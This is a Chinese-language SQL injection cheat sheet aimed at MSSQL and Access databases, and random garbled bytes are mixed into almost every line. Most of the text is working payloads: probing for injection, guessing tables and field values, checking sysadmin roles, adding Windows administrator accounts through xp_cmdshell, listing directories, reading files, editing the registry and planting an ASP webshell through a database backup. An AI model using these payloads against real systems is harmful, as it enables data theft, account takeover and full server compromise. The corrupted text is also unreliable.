1.判断是否有注入;and 1=1 ;and 1=2 �E=��91k�.
2.初步判断是否是mssql ;and user>0 ;rV+e�b)I
�jhJ<JDJ?`
3.注入参数是字符'and [查询条件] and ''=' '(-H#D.oy'
�-�@@
O<M^
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 53>(2 _/[r
�<d O�~�;
5.判断数据库系统 1jE {]/Y7&
y;���_F[m�
;and (select count(*) from sysobjects)>0 mssql 5s@xpWVot�
sRZ?�Ilua6
;and (select count(*) from msysobjects)>0 access � �F��L b�
g�_�0| `Sm
u8gqWsvruM
0`�Uw[�Er&
6.猜数据库 ;and (select Count(*) from [数据库名])>0 =Y*�@�8=�V
"{Hl�! Zq/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 pu_��?)��U
]x(�6^:�D5
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 D�l�,sl>{�
Sj�o-X��f}
9.(1)猜字段的ascii值(access) w`v`��a�w]
l��bP���n<
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �"&o"6ra�}
�dnV&�U%fO
(2)猜字段的ascii值(mssql) y`z��4S�,�
,L4zhh�l!_
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �>v���f-,B
f��:6�F5G�
10.测试权限结构(mssql) X�ka�+1c��
pE%*r@p4&4
�WJ^]mp�H9
EMpq+�LrN�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9�W,��%��[
j&
�y�kc�e
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- h!Y##_&�&4
��3i\Np =�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- |kD69
}sG
|n�m}��E�_
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- (xKyp�c+�j
}^VikT]�>1
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- /�%�gMz��F
�zF|c3a��p
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- CH�q5KB98+
Uy*d@v�U9c
;and 1=(select IS_MEMBER('db_owner'));-- A�8-a}0G�h
mg" _3]�.j
p'�6�XF�{�
Zrj#4�E��1
11.添加mssql和系统的帐户 0|C !n�+OK
%�m
[l/,2x
;exec master.dbo.sp_addlogin username;-- bdfs�'udt9
;exec master.dbo.sp_password null,username,password;-- �R0��mkEM
lr?SL\D��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �2R,8q0qR:
X|D-[|�P��
;exec master.dbo.xp_cmdshell 'net user username password 7SNdC8GZ�~
lBm`W]�3T�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �h<bhH=6~
~gHn>�]S0
;exec master.dbo.xp_cmdshell 'net user username password /add';-- P���00%EB
�Z9|A"�[�b
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- s0:M�'wA��
�9JX@c��k�
�7GS�4gSd3
�1hSV/�%v_
12.(1)遍历目录 Z>3m-:-e�
�1.PN_9%�
;create table dirs(paths varchar(100), id int) 5g
O9 �<��
0*+EYn�u+�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ,k*%=�TF7N
FBv�h7D.hV
;and (select top 1 paths from dirs)>0 ��\S�1W,H|
��sKJr3�4�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �0-;>O|�U3
l�rL:G[rt�
fE�_%,DJE(
g-B{�K� "z
(2)遍历目录 g^x=�y���
^�2{�6W�6=
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �/y|�Z�A�N
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 A�{�M��7 �
^,F��G��9
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 z]�-m<�#1�
&3�2�8pOT4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �"6U@e0�ht
<Q�C�7�HR�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 uP�ap��INj
s�INf/mv+�
L�I�&E.(�:
3 �S*KjY'@
13.mssql中的存储过程 pKGhNI�j�$
�O[�{/P:�a
xp_regenumvalues 注册表根键, 子键 &/�-MUK��N
t�;/�uRN*.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 KLj�=M;$:K
��jSH.e?��
xp_regread 根键,子键,键值名 nRu �%�0Op
~WORC\kCW�
;exec xp_regread �A�zS�u��_
��IG�{Me��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 f6Lc"�b3s1
G-|c%g!ejf
xp_regwrite 根键,子键, 值名, 值类型, 值 �*uf)t,��%
>;R`Q9�s7�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �.�M��RN)p
�5f?GSHA�}
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �*W`7�JL,�
uv8k�ea .(
xp_regdeletevalue 根键,子键,值名 +P Dk>PdEt
aXG|IN5 *m
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �i+_=7(��e
��I8% -i�i
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��WTM���
eThFRU3 F�
�Nn�r[@^M5
,4`��Vl<6�
14.mssql的backup创建webshell Y
.cjEeL@�
�6 C
O�5:\
use model Q4L=]qc T�
Q��BH|�pr
create table cmd(str image); D&I�/Tb�c�
0l�&� '��`
insert into cmd(str) values (''); 9�<�toDg_
<DPR�QhNW]
backup database model to disk='c:\l.asp'; 8�5)C7tJ-g
�6<>1,�wbq
}{j@q~�w>$
Mis B&Ok`k
15.mssql内置函数 i�$$h6��P#
}9�W[�7V�?
;and (select @@version)>0 获得Windows的版本号 �V�defgq@<
Y`{62J8�oy
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ,c$tKj5ulQ
���ujkWVE'
;and (select user_name())>0 爆当前系统的连接用户 _b>�{:�H&\
_-TW-{�7bh
;and (select db_name())>0 得到当前连接的数据库 Z2`M8�xEiH
*���?~"�Jw
��n7G`�b�'
uDk�X{<_Xe
16.简洁的webshell �=�+Odu
oNw=�O>�v�
use model �Lu:*nJ%1[
.�0RQ�bc�9
create table cmd(str image); W)�J5��[p?
�P0(LdZH6u
insert into cmd(str) values (''); @1&"S�7@}u
?u?��mS�O/
backup database model to disk='g:\wwwtest\l.asp';
